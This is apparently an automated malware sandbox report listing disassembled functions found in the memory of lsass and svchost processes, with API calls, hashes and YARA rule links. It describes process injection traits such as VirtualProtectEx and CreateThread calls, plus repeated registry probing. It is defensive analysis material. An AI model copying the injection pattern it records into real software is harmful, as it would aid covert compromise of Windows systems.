                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: 5f190d12068d21e7f72105149a9e6b1b677ccc282723ab339f17d7061e8c13d8
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 8B11D2B1318B5452EF11CB24E9483D962E2B7A878DF910030DA4883A98FF3AEB59C700
                                                                                                                                  Function 00000213BDCF1D68 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: 58b8ae4d18a9d7ce54dc40bf9e8ba119b0c8c033a8ee4458d277439975671c49
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: 78D1A032718A848AEB11CFA5D4483DC7BB2F364B9CF448116DE5D9BB99EA35C74AC340
                                                                                                                                  Function 00000213BDCE14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction ID: eb58bf133e83caa213260109bb66d5b0289825bf7e588c256d976d85c75a4a42
                                                                                                                                  • Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction Fuzzy Hash: F3011732624A90C6EB04DF66E8081897BA2F798F88F099425DB4957728EF35EA55C740
                                                                                                                                  Function 00000213BDCF26B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000213BDCF269F), ref: 00000213BDCF27D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: 6dd8b14d6a2b29fb0b261a653c056b8c27d189ef26ec33f9bdcc246479ac83d6
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: A691F232A1865085FF64CF6594587EDABA2F364B8CF444106DE4A9B799EB36C74AC300
                                                                                                                                  Function 00000213BDCE7E50 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: 4dbd28592d87c97f1d7919693cec4225b50ecbaaaf9fc19c9b7cc9b6161754a9
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: C6112A32714F049AEF00CF60E8683E833A4F76975CF441E25DB6D867A8EB79D6588340
                                                                                                                                  Function 00000213BDCE24F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: ed856d5375037952d550764fe2d8d7021114e08cc42f58974b9b3a2bedddb19f
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: E471D6B2208BC547EF25CF26D8483E9ABA6F3A978CF440135DD4947B59EA36E704CB00
                                                                                                                                  Function 00000213BDCB7E60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: 51eeb6130054d5e298a27967db7927aa67f80b3e01509a9b82b96df9f1f586ab
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 2151C4323596088AEF18CF15E448BAC3797EB68B8CF158125EE9543784FB7ADB41C744
                                                                                                                                  Function 00000213BDCB98BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: a3d5ebf9001579477b013de8e896e257403260fbb9222f2bd95932f7a22438ef
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 98617B32508BC886EB60DB15E4443DAB7A1F7A9B9CF144215EB9903B99EF7DD294CB00
                                                                                                                                  Function 00000213BDCF2420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: b8a0220e46079e6e6e547153110a55a5132d145c6cb0dc69e31944fe0a72a3d1
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: 4B41D672629A8086DB50CF65E4187D9B7A6F3A878CF804125EE4D8B75CEB79C705C740
                                                                                                                                  Function 00000213BDCE8F38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: f7b642866d3190c3efe4e526c8a752963a2fcd3109449cca9fe170efb6f19cc2
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: 0F115E32218B4482EF65CB15E404289BBE2FB98B9CF584220EB8D07758EF3DCA55C700
                                                                                                                                  Function 00000213BDCE1D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: ebba2bbedbe4dc1fa5b23b1845037a9bb1044aa480a211eaad5bbc191065d6fc
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: 0111A131A15B8482EE05CF66E40C2996BA2F798FC8F599024DF4D57728EF39EB568300
                                                                                                                                  Function 00000213BDCE1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 14f6c5856c0fcefc6cc04e4d95b1f7363111286f983ffb06d1fabdb7c087b6d8
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: 3DE06D3162160086EB04CF62D80C3C93BE2FB98F0DF45D024CA090B358EF7E9A9D8740

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00000158709D37EC Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00000158709D3805
                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 00000158709D3814
                                                                                                                                    • Part of subcall function 00000158709D3D4C: StrCmpNIW.KERNELBASE(?,?,?,00000158709D2722), ref: 00000158709D3D64
                                                                                                                                    • Part of subcall function 00000158709D3C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CA6
                                                                                                                                    • Part of subcall function 00000158709D3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CD4
                                                                                                                                    • Part of subcall function 00000158709D3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CF6
                                                                                                                                    • Part of subcall function 00000158709D3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3D11
                                                                                                                                    • Part of subcall function 00000158709D3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3D32
                                                                                                                                  • CreateThread.KERNELBASE ref: 00000158709D385B
                                                                                                                                    • Part of subcall function 00000158709D1E38: GetCurrentThread.KERNEL32 ref: 00000158709D1E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: a51febeacad88d2b24fc59a9fca5f1ce4383a6fc4ac0725936e56517b541d4cc
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: CB11807DA98E04D2FB609721AC053D932A1B7DC387F70C115A4466E292DF7DC0169E00
                                                                                                                                  Function 00000158709D3D4C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 18 158709d3d4c-158709d3d57 19 158709d3d71-158709d3d78 18->19 20 158709d3d59-158709d3d6c StrCmpNIW 18->20 20->19 21 158709d3d6e 20->21 21->19
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 0-3904844309
                                                                                                                                  • Opcode ID: 5580df2f93f9e927cc8ef56930575b5a143413bdc5efa440e0a001dab306ac07
                                                                                                                                  • Instruction ID: 8c38d3aab29e4468933ba41721884bd6a9c2eaa161661ef972de9752e6c88599
                                                                                                                                  • Opcode Fuzzy Hash: 5580df2f93f9e927cc8ef56930575b5a143413bdc5efa440e0a001dab306ac07
                                                                                                                                  • Instruction Fuzzy Hash: E6D05EBD351E09DBEB149FA18CD57E03351DB8C746F98A124C90119150DF588DAFDE10
                                                                                                                                  Function 00000158709A2C8C Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: 220f75e7d15c3eed2a92258d634bcd4488dd5313bed2004f993af08b57ce3e13
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: 6D9149B6705A50CBDB648F29D800BED73A1F788B95F6481249F497BB88DE34D853DB10
                                                                                                                                  Function 00000158709D1BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00000158709D1724: GetProcessHeap.KERNEL32 ref: 00000158709D172F
                                                                                                                                    • Part of subcall function 00000158709D1724: HeapAlloc.KERNEL32 ref: 00000158709D173E
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17AE
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17DB
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D17F5
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1815
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1830
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1850
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D186B
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D188B
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18A6
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18C6
                                                                                                                                  • SleepEx.KERNELBASE ref: 00000158709D1BDB
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18E1
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1901
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D191C
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D193C
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1957
                                                                                                                                    • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1977
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1992
                                                                                                                                    • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
